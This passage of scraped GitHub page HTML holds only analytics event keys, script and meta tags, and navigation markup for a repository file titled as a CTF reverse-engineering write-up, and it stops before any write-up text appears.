[], "id": "19079713938", "key": "click.contact_sales"}, {"experimentIds": [], "id": "19120963070", "key": "click.compare_account_plans"}, {"experimentIds": [], "id": "19151690317", "key": "click.upgrade_account_cta"}, {"experimentIds": [], "id": "19424193129", "key": "click.open_account_switcher"}, {"experimentIds": [], "id": "19520330825", "key": "click.visit_account_profile"}, {"experimentIds": [], "id": "19540970635", "key": "click.switch_account_context"}, {"experimentIds": [], "id": "19730198868", "key": "submit.homepage_signup"}, {"experimentIds": [], "id": "19820830627", "key": "click.homepage_signup"}, {"experimentIds": [], "id": "19988571001", "key": "click.create_enterprise_trial"}, {"experimentIds": [], "id": "20036538294", "key": "click.create_organization_team"}, {"experimentIds": [], "id": "20040653299", "key": "click.input_enterprise_trial_form"}, {"experimentIds": [], "id": "20062030003", "key": "click.continue_with_team"}, {"experimentIds": [], "id": "20068947153", "key": "click.create_organization_free"}, {"experimentIds": [], "id": "20086636658", "key": "click.signup_continue.username"}, {"experimentIds": [], "id": "20091648988", "key": "click.signup_continue.create_account"}, {"experimentIds": [], "id": "20103637615", "key": "click.signup_continue.email"}, {"experimentIds": [], "id": "20111574253", "key": "click.signup_continue.password"}, {"experimentIds": [], "id": "20120044111", "key": "view.pricing_page"}, {"experimentIds": [], "id": "20152062109", "key": "submit.create_account"}, {"experimentIds": [], "id": "20165800992", "key": "submit.upgrade_payment_form"}, {"experimentIds": [], "id": "20171520319", "key": "submit.create_organization"}, {"experimentIds": [], "id": "20222645674", "key": "click.recommended_plan_in_signup.discuss_your_needs"}, {"experimentIds": [], "id": "20227443657", "key": "submit.verify_primary_user_email"}, {"experimentIds": [], "id": "20234607160", "key": "click.recommended_plan_in_signup.try_enterprise"}, {"experimentIds": [], "id": "20238175784", "key": "click.recommended_plan_in_signup.team"}, {"experimentIds": [], "id": "20239847212", "key": "click.recommended_plan_in_signup.continue_free"}, {"experimentIds": [], "id": "20251097193", "key": "recommended_plan"}, {"experimentIds": [], "id": "20438619534", "key": "click.pricing_calculator.1_member"}, {"experimentIds": [], "id": "20456699683", "key": "click.pricing_calculator.15_members"}, {"experimentIds": [], "id": "20467868331", "key": "click.pricing_calculator.10_members"}, {"experimentIds": [], "id": "20476267432", "key": "click.trial_days_remaining"}, {"experimentIds": [], "id": "20476357660", "key": "click.discover_feature"}, {"experimentIds": [], "id": "20479287901", "key": "click.pricing_calculator.custom_members"}, {"experimentIds": [], "id": "20481107083", "key": "click.recommended_plan_in_signup.apply_teacher_benefits"}, {"experimentIds": [], "id": "20483089392", "key": "click.pricing_calculator.5_members"}, {"experimentIds": [], "id": "20484283944", "key": "click.onboarding_task"}, {"experimentIds": [], "id": "20484996281", "key": "click.recommended_plan_in_signup.apply_student_benefits"}, {"experimentIds": [], "id": "20486713726", "key": "click.onboarding_task_breadcrumb"}, {"experimentIds": [], "id": "20490791319", "key": "click.upgrade_to_enterprise"}, {"experimentIds": [], "id": "20491786766", "key": "click.talk_to_us"}, {"experimentIds": [], "id": "20494144087", "key": "click.dismiss_enterprise_trial"}, {"experimentIds": [], "id": "20499722759", "key": "completed_all_tasks"}, {"experimentIds": [], "id": "20500710104", "key": "completed_onboarding_tasks"}, {"experimentIds": [], "id": "20513160672", "key": "click.read_doc"}, {"experimentIds": [], "id": "20516196762", "key": "actions_enabled"}, {"experimentIds": [], "id": "20518980986", "key": "click.dismiss_trial_banner"}, {"experimentIds": [], "id": "20535446721", "key": "click.issue_actions_prompt.dismiss_prompt"}, {"experimentIds": [], "id": "20557002247", "key": "click.issue_actions_prompt.setup_workflow"}, {"experimentIds": [], "id": "20595070227", "key": "click.pull_request_setup_workflow"}, {"experimentIds": [], "id": "20626600314", "key": "click.seats_input"}, {"experimentIds": [], "id": "20642310305", "key": "click.decrease_seats_number"}, {"experimentIds": [], "id": "20662990045", "key": "click.increase_seats_number"}, {"experimentIds": [], "id": "20679620969", "key": "click.public_product_roadmap"}, {"experimentIds": [], "id": "20761240940", "key": "click.dismiss_survey_banner"}, {"experimentIds": [], "id": "20767210721", "key": "click.take_survey"}, {"experimentIds": [], "id": "20795281201", "key": "click.archive_list"}, {"experimentIds": [], "id": "20966790249", "key": "contact_sales.submit"}, {"experimentIds": [], "id": "20996500333", "key": "contact_sales.existing_customer"}, {"experimentIds": [], "id": "20996890162", "key": "contact_sales.blank_message_field"}, {"experimentIds": [], "id": "21000470317", "key": "contact_sales.personal_email"}, {"experimentIds": [], "id": "21002790172", "key": "contact_sales.blank_phone_field"}, {"experimentIds": [], "id": "21354412592", "key": "click.dismiss_create_readme"}, {"experimentIds": [], "id": "21366102546", "key": "click.dismiss_zero_user_content"}, {"experimentIds": [], "id": "21370252505", "key": "account_did_downgrade"}, {"experimentIds": [], "id": "21370840408", "key": "click.cta_create_readme"}, {"experimentIds": [], "id": "21375451068", "key": "click.cta_create_new_repository"}, {"experimentIds": [], "id": "21385390948", "key": "click.zero_user_content"}, {"experimentIds": [], "id": "21467712175", "key": "click.downgrade_keep"}, {"experimentIds": [], "id": "21484112202", "key": "click.downgrade"}, {"experimentIds": [], "id": "21495292213", "key": "click.downgrade_survey_exit"}, {"experimentIds": [], "id": "21508241468", "key": "click.downgrade_survey_submit"}, {"experimentIds": [], "id": "21512030356", "key": "click.downgrade_support"}, {"experimentIds": [], "id": "21539090022", "key": "click.downgrade_exit"}, {"experimentIds": [], "id": "21543640644", "key": "click_fetch_upstream"}, {"experimentIds": [], "id": "21646510300", "key": "click.move_your_work"}, {"experimentIds": [], "id": "21656151116", "key": "click.add_branch_protection_rule"}, {"experimentIds": [], "id": "21663860599", "key": "click.downgrade_dialog_open"}, {"experimentIds": [], "id": "21687860483", "key": "click.learn_about_protected_branches"}, {"experimentIds": [], "id": "21689050333", "key": "click.dismiss_protect_this_branch"}, {"experimentIds": [], "id": "21864370109", "key": "click.sign_in"}], "revision": "1372"}" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_optimizely_optimizely-sdk_dist_optimizely_browser_es_min_js-node_modules-3f2a9e-65eee21d1482.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-26cee11e2e10.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <title>CTF/README.md at dfb67321400248b74e9f565101748e44c8945ed9 · TwentySick/CTF · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/blob/*name(/*path)"> <meta name="current-catalog-service-hash" content="581425c0eaaa5e5e53c5b736f58a14dbe5d38b0be425901738ad0670bd1d5a33"> <meta name="request-id" content="D830:0D35:128A1910:1309ED87:64121B8D" data-pjax-transient="true"/><meta name="html-safe-nonce" content="7a91dcf454f0e1c80b4579ea3d7fbb20f6216d6b4ead4c8ebd4322d0d265af2d" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJEODMwOjBEMzU6MTI4QTE5MTA6MTMwOUVEODc6NjQxMjFCOEQiLCJ2aXNpdG9yX2lkIjoiNTM4MTAwMTkwNjQ5MDU3OTg1MyIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="3ccd76c21e971f81e414b70ab47201e74c10f0b81256012e6ee90ebf927c47df" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:475531499" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" /> <meta name="selected-link" value="repo_source" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/blob/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="It's about CTFs that I've solved. There are my writeup for those challenges - CTF/README.md at dfb67321400248b74e9f565101748e44c8945ed9 · TwentySick/CTF"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/81f29a9c15bdafb93546a69a6a7ea15d74945d54addeafb41f22e1fa246ce6b8/TwentySick/CTF" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF/README.md at dfb67321400248b74e9f565101748e44c8945ed9 · TwentySick/CTF" /><meta name="twitter:description" content="It's about CTFs that I've solved. There are my writeup for those challenges - CTF/README.md at dfb67321400248b74e9f565101748e44c8945ed9 · TwentySick/CTF" /> <meta property="og:image" content="https://opengraph.githubassets.com/81f29a9c15bdafb93546a69a6a7ea15d74945d54addeafb41f22e1fa246ce6b8/TwentySick/CTF" /><meta property="og:image:alt" content="It's about CTFs that I've solved. There are my writeup for those challenges - CTF/README.md at dfb67321400248b74e9f565101748e44c8945ed9 · TwentySick/CTF" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF/README.md at dfb67321400248b74e9f565101748e44c8945ed9 · TwentySick/CTF" /><meta property="og:url" content="https://github.com/TwentySick/CTF" /><meta property="og:description" content="It's about CTFs that I've solved. There are my writeup for those challenges - CTF/README.md at dfb67321400248b74e9f565101748e44c8945ed9 · TwentySick/CTF" /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta data-hydrostats="publish"> <meta name="go-import" content="github.com/TwentySick/CTF git https://github.com/TwentySick/CTF.git"> <meta name="octolytics-dimension-user_id" content="94169830" /><meta name="octolytics-dimension-user_login" content="TwentySick" /><meta name="octolytics-dimension-repository_id" content="475531499" /><meta name="octolytics-dimension-repository_nwo" content="TwentySick/CTF" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="475531499" /><meta name="octolytics-dimension-repository_network_root_nwo" content="TwentySick/CTF" /> <link rel="canonical" href="https://github.com/TwentySick/CTF/blob/dfb67321400248b74e9f565101748e44c8945ed9/2022/DCTF/reverse_engineering/seek/README.md" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive page-blob"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" 